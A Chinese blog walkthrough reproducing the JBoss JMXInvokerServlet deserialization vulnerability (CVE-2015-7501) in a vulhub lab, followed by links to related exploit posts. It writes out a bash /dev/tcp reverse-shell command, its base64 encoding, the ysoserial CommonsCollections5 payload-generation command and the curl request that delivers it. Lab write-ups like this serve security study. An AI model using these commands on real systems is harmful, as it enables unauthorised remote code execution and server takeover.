JBoss JMXInvokerServlet 反序列化漏洞复现(CVE-2015-7501)

最新推荐文章于 2025-03-23 19:29:31 发布
最新推荐文章于 2025-03-23 19:29:31 发布
阅读量766 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wutiangui/article/details/132805336
版权

一、漏洞说明
JBoss中/invoker/JMXInvokerServlet路径对外开放,JBoss的jmx组件支持反序列化。JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。
二、影响版本
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
三、搭建环境
cd vulhub\jboss\JMXInvokerServlet-deserialization
在这里插入图片描述在这里插入图片描述

四、漏洞验证
访问:8080/invoker/JMXInvokerServlet,返回如下页面(下载文件),说明接口开放,此接口存在反序列化漏洞。
在这里插入图片描述

下载了以下文件
在这里插入图片描述

五、漏洞复现
1.nc开启监听
在这里插入图片描述

2.生成序列化数据
使用工具ysoserial.jar生成序列化数据
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
Base64编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==
所以payload:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser
执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
在这里插入图片描述

然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用
3.反弹shell
使用序列化数据反弹shell
curl http://192.168.25.128:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
在这里插入图片描述在这里插入图片描述

漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 749
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
漏洞复现Jboss反序列化漏洞CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 1011
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
【vulhub】JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501复现
qq_45300786的博客
04-15 1316
漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SO
常见中间件漏洞之三:Jboss
最新发布
gysadsadsa的博客
03-23 857
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501
m0_49025459的博客
12-06 427
漏洞概述 JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码。 影响范围 红帽 JBoss A-MQ 6.x;BPM 套件 (BPMS) 6.x;BRMS 6.x 和 5.x;数据网格(JDG)6.x;数据虚拟化 (JDV) 6.x 和 5.x;企业应用平台 6.x、5.x 和 4.3.x;保险丝 6.x; 保险丝维修工程 (FSW) 6.x;运营网络(JBoss ON)3.x;
jboss CVE-2015-7501 反序列化漏洞
读书 买花 长大
06-04 1777
CVE-2015-7501
JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现
qq_42430287的博客
12-23 1780
如果payload请求成功,在响应头中返回的状态码为200,在响应体中抛出 org.jboss.invocation.InvocationException异常信息,则需要结合网络日志和流量日志进行分析。如果返回其他状态码,则攻击失败。
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
渗透测试人员使用“CVE-2015-7501-master”这样的工具是为了模拟攻击,评估系统对这种类型漏洞的防御能力。该工具可能包含了构造恶意序列化数据的方法,以及利用漏洞获得shell的方法。在进行渗透测试时,这些工具...
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 382
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)复现
KaNongDD的博客
09-18 1483
前言 写这篇文章是因为,现在优快云环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)--vulhub
ccc_9wy的博客
12-18 376
JBossJMXInvokerServlet 反序列化漏洞CVE-2015-7501;vulhub;ysoserial-all.jar;漏洞复现
Jboss反序列化漏洞CVE-2015-7501
2401_82451607的博客
09-22 488
Jboss反序列化漏洞CVE-2015-7501
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501CVE-2017-12149)
来到了学渣的博客
08-29 5603
JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。 CVE-2017-12149适用JBoss版本:5.x / 6.x 踩坑提醒:生成的ser文件最好在linux系统操作,windows会出现各种错误,甚至shell反弹不回来。 步骤: 发现漏洞指纹→反弹shell进行编码→用ysoserial把编码好的反弹shell生ser文件→启动监听→用curl或
JBoss JMXInvokerServlet 反序列化漏洞
Kevin's Blog
06-08 2671
一、漏洞介绍 1.1 漏洞简介   经典的JBoss反序列化漏洞JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象存在反序列化漏洞。 1.2 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.
JBoss 5.x/6.x 反序列化漏洞 CVE-2017-12149 漏洞复现
ADummy的博客
03-03 438
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1858
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
Jboss漏洞CVE-2015-7501
qq_68186313的博客
08-06 342
这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码。1、访问,返回如下,说明接⼝开放,此接⼝存在反序列化漏洞。2、下载 ysoserial ⼯具进⾏漏洞利⽤。
JexBoss反序列化漏洞(JMXInvokerServlet)
红队是青春
05-26 968
## jexboss(JMXInvokerServlet)原理 JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象,然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码,可以利用用户传入的方法,反弹shell,拿下服务器权限。 ```python exp下载地址:https://github.com/joaomatosf/jexboss ``` ## 影响范围 JBoss Enterprise Appl.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值